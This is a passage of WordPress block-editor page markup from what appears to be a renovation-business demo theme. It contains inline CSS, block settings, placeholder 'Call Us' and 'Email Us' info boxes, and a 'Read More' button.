}\n}\n</style><div class=\"skt-blocks-advanced-column-child block-49f17b93-2599-4872-8e40-24f70dd3d637\" style=\"width:45%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"500\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":18,\"title\":\"call-icon\",\"filename\":\"call-icon.png\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/call-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/call-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"call-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:33.000Z\",\"modified\":\"2021-05-25T13:48:33.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"5b5e5edc14\",\"delete\":\"ba6642c69e\",\"edit\":\"618a805067\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=18u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":593,\"filesizeHumanReadable\":\"593 B\",\"context\":\"\",\"height\":24,\"width\":23,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/call-icon.png\",\"height\":24,\"width\":23,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"589b4b84-a062-4135-9c5d-615fe7d3d8c5\"} -->\n<style type=\"text/css\"> .skt-blocks-block-589b4b84-a062-4135-9c5d-615fe7d3d8c5 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-589b4b84-a062-4135-9c5d-615fe7d3d8c5 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-589b4b84-a062-4135-9c5d-615fe7d3d8c5 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-589b4b84-a062-4135-9c5d-615fe7d3d8c5 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-589b4b84-a062-4135-9c5d-615fe7d3d8c5 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-589b4b84-a062-4135-9c5d-615fe7d3d8c5 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-589b4b84-a062-4135-9c5d-615fe7d3d8c5 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-589b4b84-a062-4135-9c5d-615fe7d3d8c5.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-589b4b84-a062-4135-9c5d-615fe7d3d8c5.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-589b4b84-a062-4135-9c5d-615fe7d3d8c5 .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-589b4b84-a062-4135-9c5d-615fe7d3d8c5.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-589b4b84-a062-4135-9c5d-615fe7d3d8c5.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-589b4b84-a062-4135-9c5d-615fe7d3d8c5 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-589b4b84-a062-4135-9c5d-615fe7d3d8c5.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-589b4b84-a062-4135-9c5d-615fe7d3d8c5.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-589b4b84-a062-4135-9c5d-615fe7d3d8c5 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-589b4b84-a062-4135-9c5d-615fe7d3d8c5.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-589b4b84-a062-4135-9c5d-615fe7d3d8c5 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/call-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:500;font-family:Poppins;margin-bottom:5px\">Call Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">123 456 7890</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":55,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":15,\"blockId\":\"dde43036-8f6f-4d37-a25e-7f922d99989d\"} -->\n<style type=\"text/css\"> .block-dde43036-8f6f-4d37-a25e-7f922d99989d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-dde43036-8f6f-4d37-a25e-7f922d99989d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-dde43036-8f6f-4d37-a25e-7f922d99989d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-dde43036-8f6f-4d37-a25e-7f922d99989d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-dde43036-8f6f-4d37-a25e-7f922d99989d .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-dde43036-8f6f-4d37-a25e-7f922d99989d\" style=\"width:55%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"600\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":19,\"title\":\"email-icon\",\"filename\":\"email-icon.png\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/email-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/email-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"email-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:34.000Z\",\"modified\":\"2021-05-25T13:48:34.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"322c42b944\",\"delete\":\"c562e168cc\",\"edit\":\"244b0c81a3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=19u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":451,\"filesizeHumanReadable\":\"451 B\",\"context\":\"\",\"height\":16,\"width\":23,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/email-icon.png\",\"height\":16,\"width\":23,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"8a38d1a7-8da1-4619-965d-25f1023e1533\"} -->\n<style type=\"text/css\"> .skt-blocks-block-8a38d1a7-8da1-4619-965d-25f1023e1533 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8a38d1a7-8da1-4619-965d-25f1023e1533 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-8a38d1a7-8da1-4619-965d-25f1023e1533 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8a38d1a7-8da1-4619-965d-25f1023e1533 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-8a38d1a7-8da1-4619-965d-25f1023e1533 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8a38d1a7-8da1-4619-965d-25f1023e1533 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8a38d1a7-8da1-4619-965d-25f1023e1533 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-8a38d1a7-8da1-4619-965d-25f1023e1533.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-8a38d1a7-8da1-4619-965d-25f1023e1533.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-8a38d1a7-8da1-4619-965d-25f1023e1533 .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-8a38d1a7-8da1-4619-965d-25f1023e1533.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-8a38d1a7-8da1-4619-965d-25f1023e1533.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-8a38d1a7-8da1-4619-965d-25f1023e1533 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-8a38d1a7-8da1-4619-965d-25f1023e1533.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-8a38d1a7-8da1-4619-965d-25f1023e1533.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-8a38d1a7-8da1-4619-965d-25f1023e1533 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-8a38d1a7-8da1-4619-965d-25f1023e1533.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-8a38d1a7-8da1-4619-965d-25f1023e1533 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/email-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:600;font-family:Poppins;margin-bottom:5px\">Email Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">info@sitename.com</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Read More\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/about/\",\"target\":false,\"counterId\":\"9c9da01d-f799-4178-ae4b-9714df123864\",\"vPadding\":15,\"hPadding\":35,\"vMargin\":0,\"hMargin\":0,\"borderRadius\":50,\"borderStyle\":\"none\",\"borderColor\":\"#ffffff\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":16,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 0px !important; margin-bottom: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 15px; padding-bottom: 15px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: #ffffff; border-radius: 50px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 16px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 16px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/about/\">Read More</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"dbf37e29-6ff2-4fdf-bd16-f15e09408964\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-2\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-2 skt-blocks-block-section-outer-wrap block-dbf37e29-6ff2-4fdf-bd16-f15e09408964 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-dbf37e29-6ff2-4fdf-bd16-f15e09408964 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-dbf37e29-6ff2-4fdf-bd16-f15e09408964 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-dbf37e29-6ff2-4fdf-bd16-f15e09408964 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-dbf37e29-6ff2-4fdf-bd16-f15e09408964.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-dbf37e29-6ff2-4fdf-bd16-f15e09408964.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-dbf37e29-6ff2-4fdf-bd16-f15e09408964.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-dbf37e29-6ff2-4fdf-bd16-f15e09408964.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-dbf37e29-6ff2-4fdf-bd16-f15e09408964.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-dbf37e29-6ff2-4fdf-bd16-f15e09408964 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-dbf37e29-6ff2-4fdf-bd16-f15e09408964 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-dbf37e29-6ff2-4fdf-bd16-f15e09408964.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-dbf37e29-6ff2-4fdf-bd16-f15e09408964 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-dbf37e29-6ff2-4fdf-bd16-f15e09408964.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-dbf37e29-6ff2-4fdf-bd16-f15e09408964 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-dbf37e29-6ff2-4fdf-bd16-f15e09408964.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"5954886e-7d3c-4aeb-a879-0aa3c3e42338\"} -->\n<style type=\"text/css\"> .block-5954886e-7d3c-4aeb-a879-0aa3c3e42338 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-5954886e-7d3c-4aeb-a879-0aa3c3e42338 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-5954886e-7d3c-4aeb-a879-0aa3c3e42338 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-5954886e-7d3c-4aeb-a879-0aa3c3e42338 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-5954886e-7d3c-4aeb-a879-0aa3c3e42338 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-5954886e-7d3c-4aeb-a879-0aa3c3e42338 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-5954886e-7d3c-4aeb-a879-0aa3c3e42338 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-5954886e-7d3c-4aeb-a879-0aa3c3e42338 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"leftPadding\":15,\"leftPaddingTablet\":15,\"blockId\":\"bc1f54ef-8f3f-4ef0-8e20-f2a86367b39a\"} -->\n<style type=\"text/css\"> .block-bc1f54ef-8f3f-4ef0-8e20-f2a86367b39a .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-bc1f54ef-8f3f-4ef0-8e20-f2a86367b39a .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-bc1f54ef-8f3f-4ef0-8e20-f2a86367b39a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-bc1f54ef-8f3f-4ef0-8e20-f2a86367b39a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-bc1f54ef-8f3f-4ef0-8e20-f2a86367b39a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-bc1f54ef-8f3f-4ef0-8e20-f2a86367b39a\" style=\"width:50%\"><div class=\"responsive-column-wrap 